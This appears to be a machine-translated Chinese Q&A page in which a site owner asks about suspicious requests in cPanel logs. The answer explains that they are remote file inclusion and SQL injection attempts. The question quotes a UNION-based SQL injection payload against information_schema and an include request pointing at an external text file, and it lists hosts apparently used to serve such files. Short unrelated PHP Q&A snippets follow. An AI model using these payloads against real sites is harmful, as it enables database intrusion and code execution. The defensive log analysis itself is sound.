在cPanel的Analog Stats统计信息模块中,我注意到有无数请求连接到以下示例:
/?x=19&y=15
数字是随机的,但始终设置x和y变量。
另一类神秘的请求:
/?id=http://nic.bupt.edu.cn/media/j1.txt??
在请求日志中还进行了其他尝试,这些尝试中也直接写入了SQL。例:
/jobs/jobinfo.php?id=-999.9 UNION ALL SELECT 1,(SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0x73636363726F6F745F7075626C6963),3,4,5,6,7,8,9,10,11,12,13--
看起来它们都达到了404,但是我仍然想知道它们背后的意图。
我知道这很模糊,但也许有人知道使用cPanel和phpMyAdmin服务时这是正常的。另外,网站上安装了一个搜索框,这可能是原因。
关于这些都是什么建议?
编辑
我将所有这些从请求列表中拉出,并切下了它们指向的txt。也许这可以为这些攻击提供更多帮助。
http://www.diakonia-jkt.sch.id
http://www.nationalmedecine.com
http://muzykologia.lublin.pl
Hello
http://stul.netsolutions.cz
http://jack.tiscali.it
http://solid.go.ro
http://nic.bupt.edu.cn
http://www.europeanforumcyprus.eu
http://www.nationalmedecine.com
另外,在phpMyAdmin状态部分中,它每小时显示约900个更改数据库查询。仅选择privs的用户可以对数据库造成任何实际损害吗?上面没有个人信息,但是这些SOB阻塞了带宽。
参考方案
这些(除了顶部的)是自动化的(?)尝试,以发现代码中的弱点;
/?id = http://nic.bupt.edu.cn/media/j1.txt ??
尝试从另一台服务器导入PHP页面。一个众所周知的问题,尤其是对于较旧的PHP软件。
“ UNION ALL SELECT 1”是明显的SQL插入尝试。模式ID 0x73636363726F6F745F7075626C6963解码为“ scccroot_public”。我不确定这是哪个数据库。但是,他们确实想控制它。
PHP-将日期插入日期时间字段 - php我已在数据库中使用datetime字段存储日期,使用PHP将“今天的日期”插入该字段的正确方法是什么?干杯, 参考方案 我认为您可以使用php date()函数
PHP-如何获取类的成员函数列表? - php如果我知道班级的名字。有没有办法知道类的成员函数列表? 参考方案 get_class_methods()是你的朋友
php ziparchive类源代码 - phpImprove this question 我如何获取ziparchive类本身的源代码。 参考方案 假设您在谈论PHP ZipArchive class:下载PHP source code并查找适当的文件。如果您希望源代码是PHP代码,您可能会感到失望,因为源代码是用C语言编写的。或者,也可以在PHP Github Development Reposito…
PHP getallheaders替代 - php我正在尝试从服务器上的apache切换到nginx。唯一的问题是我在PHP脚本中使用的getallheaders()函数,该函数不适用于Nginx。我已经尝试过用户在getallheaders函数上的php站点上提供的注释,但这并不返回所有请求标头。请告诉我如何解决这个问题。我真的想切换到Nginx。 参考方案 您仍然可以使用它,但是您必须像这里一样重新定义…
PHP-如何建议搜索字词,“你是说……?” - php当使用不检索任何结果的术语搜索数据库时,我想允许“您是不是……”建议(例如Google)。例如,如果有人寻找“ jquyer””,它将输出“ did you mean jquery?”当然,建议结果必须与数据库内部的值匹配(我正在使用mysql)。您知道可以做到这一点的图书馆吗?我已经用谷歌搜索过,但是没有找到任何好的结果。或者,也许您有一个想法,该如何独自…